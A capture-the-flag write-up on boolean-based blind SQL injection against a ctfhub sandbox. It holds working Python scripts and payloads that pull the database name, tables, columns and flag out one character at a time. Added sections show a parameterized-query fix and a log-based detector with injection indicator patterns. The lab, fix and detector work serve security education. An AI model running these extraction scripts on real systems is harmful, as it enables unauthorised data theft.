ctfhub: SQL boolean-based blind injection
2022-06-11 17:46:00 【榴莲 蛋挞】
Open the challenge URL and first submit:
1 and length(database())>3, which gives:

Then submit:
1 and length(database())<3, which gives:

The two responses differ, so the page leaks whether the appended condition is true or false: boolean-based blind injection is possible.
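As an added example that is not part of the original write-up, the Python below reproduces on a constructed in-memory sqlite3 table why such an endpoint behaves as a boolean oracle when the id is pasted into the SQL text, and why the same lookup with a bound parameter and an integer check does not. sqlite3 stands in for the challenge's MySQL backend, so the MySQL-only `database()` call is replaced by a plain true/false condition; the table name, column name and the `query_success`/`query_failed` response strings are assumptions.

```python
import sqlite3


def make_db():
    """Constructed schema standing in for the challenge's database (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'hello')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Builds the statement by string concatenation: whatever follows the
    number in ?id= becomes part of the WHERE clause, and the two possible
    responses leak one bit per request."""
    sql = "SELECT title FROM news WHERE id = " + user_id
    row = conn.execute(sql).fetchone()
    return "query_success" if row else "query_failed"


def lookup_parameterized(conn, user_id):
    """Same lookup with input validation and a bound parameter. The value can
    only ever be compared against id; it never becomes SQL syntax."""
    if not user_id.isdigit():
        return "bad_request"
    row = conn.execute(
        "SELECT title FROM news WHERE id = ?", (int(user_id),)
    ).fetchone()
    return "query_success" if row else "query_failed"


def oracle_leaks(conn, lookup):
    """True if the endpoint answers differently for a true and a false appended
    condition, i.e. it can be used as a boolean oracle."""
    return lookup(conn, "1 and 1=1") != lookup(conn, "1 and 1=2")


if __name__ == "__main__":
    conn = make_db()
    for name, fn in (("concatenated", lookup_vulnerable),
                     ("parameterized", lookup_parameterized)):
        for probe in ("1", "1 and 1=1", "1 and 1=2"):
            print(f"{name:14} {probe!r:14} -> {fn(conn, probe)}")
        print(f"{name:14} oracle leaks: {oracle_leaks(conn, fn)}")
```

The concatenated version answers `query_success` for `1 and 1=1` and `query_failed` for `1 and 1=2`, which is exactly the signal the scripts in this write-up rely on; the parameterized version returns the same `bad_request` for both, so there is nothing to enumerate.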
Look up the current database name:
```python
import requests

sess = requests.session()  # reuse one HTTP session for all probes
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
for j in range(1, 5):            # character position in database()
    for i in range(43, 126):     # candidate ASCII value for that position
        ss = "?id=1 and ascii(substr(database()," + str(j) + ",1))=" + str(i)
        url = url1 + ss
        pa = sess.get(url=url).text
        if "query_success" in pa:   # page text differs when the condition is true
            st += chr(i)
            break
print(st)
```
Next, get the names of the tables in the current database, using the payload:
?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),j,1))=i
```python
import requests

sess = requests.session()
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
for j in range(1, 10):           # character position in the comma-joined table list
    for i in range(43, 126):     # candidate ASCII value
        ss = ("?id=1 and ascii(substr((select group_concat(table_name) "
              "from information_schema.tables where table_schema='sqli'),"
              + str(j) + ",1))=" + str(i))
        url = url1 + ss
        pa = sess.get(url=url).text
        if "query_success" in pa:
            st += chr(i)
            break
print(st)
```
Result:

Then look at the columns in the flag table, using the payload:
?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),j,1))=i
```python
import requests

sess = requests.session()
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
for j in range(1, 10):           # character position in the comma-joined column list
    for i in range(43, 126):     # candidate ASCII value
        ss = ("?id=1 and ascii(substr((select group_concat(column_name) "
              "from information_schema.columns where table_name='flag'),"
              + str(j) + ",1))=" + str(i))
        url = url1 + ss
        pa = sess.get(url=url).text
        if "query_success" in pa:
            st += chr(i)
            break
print(st)
```
Result:

Finally, read the contents of the flag column in the flag table, using the payload:
?id=1 and ascii(substr((select flag from flag),j,1))=i
```python
import requests

sess = requests.session()
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
for j in range(1, 40):           # character position in the flag value
    for i in range(43, 126):     # candidate ASCII value
        ss = "?id=1 and ascii(substr((select flag from flag)," + str(j) + ",1))=" + str(i)
        url = url1 + ss
        pa = sess.get(url=url).text
        if "query_success" in pa:
            st += chr(i)
            break
print(st)
```
Result:
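From the defender's side, the traffic produced by the scripts above is easy to recognise: for every character position the client sends up to 83 requests that are identical except for the compared ASCII value. As an added example that is not part of the original write-up, the Python below runs a small detector over constructed Common Log Format lines whose URL-encoded query strings mirror this write-up's payloads. The log format, the client addresses, the indicator patterns and the burst threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (assumption: Common Log Format).
# 203.0.113.7 mirrors the write-up's scripts: one probe template repeated with
# only the compared value changing. 198.51.100.5 is ordinary traffic for contrast.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jun/2022:17:40:01 +0800] "GET /?id=1 HTTP/1.1" 200 512
203.0.113.7 - - [11/Jun/2022:17:40:02 +0800] "GET /?id=1%20and%20length(database())%3E3 HTTP/1.1" 200 512
203.0.113.7 - - [11/Jun/2022:17:40:03 +0800] "GET /?id=1%20and%20ascii(substr(database(),1,1))%3D43 HTTP/1.1" 200 498
203.0.113.7 - - [11/Jun/2022:17:40:03 +0800] "GET /?id=1%20and%20ascii(substr(database(),1,1))%3D44 HTTP/1.1" 200 498
203.0.113.7 - - [11/Jun/2022:17:40:04 +0800] "GET /?id=1%20and%20ascii(substr(database(),1,1))%3D45 HTTP/1.1" 200 498
203.0.113.7 - - [11/Jun/2022:17:40:09 +0800] "GET /?id=1%20and%20ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3D'sqli'),1,1))%3D102 HTTP/1.1" 200 512
198.51.100.5 - - [11/Jun/2022:17:41:00 +0800] "GET /?id=2 HTTP/1.1" 200 530
198.51.100.5 - - [11/Jun/2022:17:41:05 +0800] "GET /?id=3 HTTP/1.1" 200 540
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+)')

# Patterns matched against the URL-decoded, lower-cased query string. They are
# the building blocks of the payloads used in this write-up (assumed indicator set).
INDICATORS = {
    "length_probe": re.compile(r"\band\s+length\s*\("),
    "char_oracle": re.compile(r"\bascii\s*\(\s*substr"),
    "schema_enum": re.compile(r"information_schema\."),
    "tautology": re.compile(r"\band\s+\d+\s*=\s*\d+\b"),
}


def decode_query(path):
    """Return the URL-decoded query string of a request path, lower-cased."""
    return unquote_plus(urlsplit(path).query).lower()


def classify(path):
    """List the indicator names matched by one request path (empty for benign)."""
    q = decode_query(path)
    return [name for name, rx in INDICATORS.items() if rx.search(q)]


def template(query):
    """Collapse every digit run to '#', so probes that differ only in the
    compared value or the character position share one template."""
    return re.sub(r"\d+", "#", query)


def analyse(log_text, burst_threshold=3):
    """Per client IP: number of probe requests and the probe templates repeated
    at least burst_threshold times (the character-by-character enumeration
    signature). Clients with no probe requests are not reported."""
    probes = defaultdict(int)
    templates = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _method, path, _status, _size = m.groups()
        if classify(path):
            probes[ip] += 1
            templates[ip][template(decode_query(path))] += 1
    report = {}
    for ip, n in probes.items():
        bursts = [t for t, c in templates[ip].items() if c >= burst_threshold]
        report[ip] = {"probe_requests": n, "bursts": bursts}
    return report


if __name__ == "__main__":
    for ip, info in analyse(SAMPLE_LOG).items():
        print(ip, info)
```

On the sample lines the detector reports 203.0.113.7 with five probe requests and one burst template, `id=# and ascii(substr(database(),#,#))=#`, while 198.51.100.5 never appears. In a real deployment the burst grouping is the more robust signal: the indicator strings can be obfuscated, but an attacker extracting data one bit at a time still has to send many near-identical requests.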